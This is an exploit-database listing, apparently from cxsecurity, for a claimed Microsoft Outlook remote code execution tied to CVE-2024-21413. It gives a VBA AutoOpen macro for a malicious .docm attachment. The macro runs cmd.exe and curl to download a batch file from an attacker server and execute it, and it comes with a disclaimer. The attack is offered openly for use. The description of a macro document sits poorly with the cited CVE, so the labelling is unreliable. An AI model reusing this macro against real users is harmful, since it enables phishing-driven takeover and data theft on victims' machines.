Microsoft Outlook Remote Code Execution Vulnerability - CVE-2024-21413

2024.03.24
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

## Title: Microsoft Outlook Remote Code Execution Vulnerability ## Author: nu11secur1ty ## Date: 03/20/2024 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook ## Reference: https://www.bugcrowd.com/glossary/remote-code-execution-rce/ ## CVE: CVE-2024-21413 ## Description: By sending a malicious (.docm) file, to the victim using the Outlook mail – app of 365, the attacker will wait for the victim to click on it by using and executing his malicious code after the victim opens this file. After this action, the attacker can get control of some parts of the Windows services, he can steal sensitive information, and make a bot machine from the victim’s PC. STATUS: MEDIUM- Vulnerability ## Exploit: The exploit can be deployed on a remote attacking server, as you can see on the second [video](https://youtu.be/zxrlV8lgoB0?si=YrTOR3wk_QLuABbd). I am not responsible if someone breaks someone's system. You will respond FRONT OF THE LAW! ``` Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://path_to_your_exploit_server.bat > PoC.bat && .\PoC.bat", vbNormalFocus) End Sub ``` ## Source: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2024/CVE-2024-21413) ## Proof and Exploit: [href](https://www.youtube.com/watch?v=zxrlV8lgoB0) [href](https://www.patreon.com/posts/microsoft-remote-100840891) ## Time spent: 01:17:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top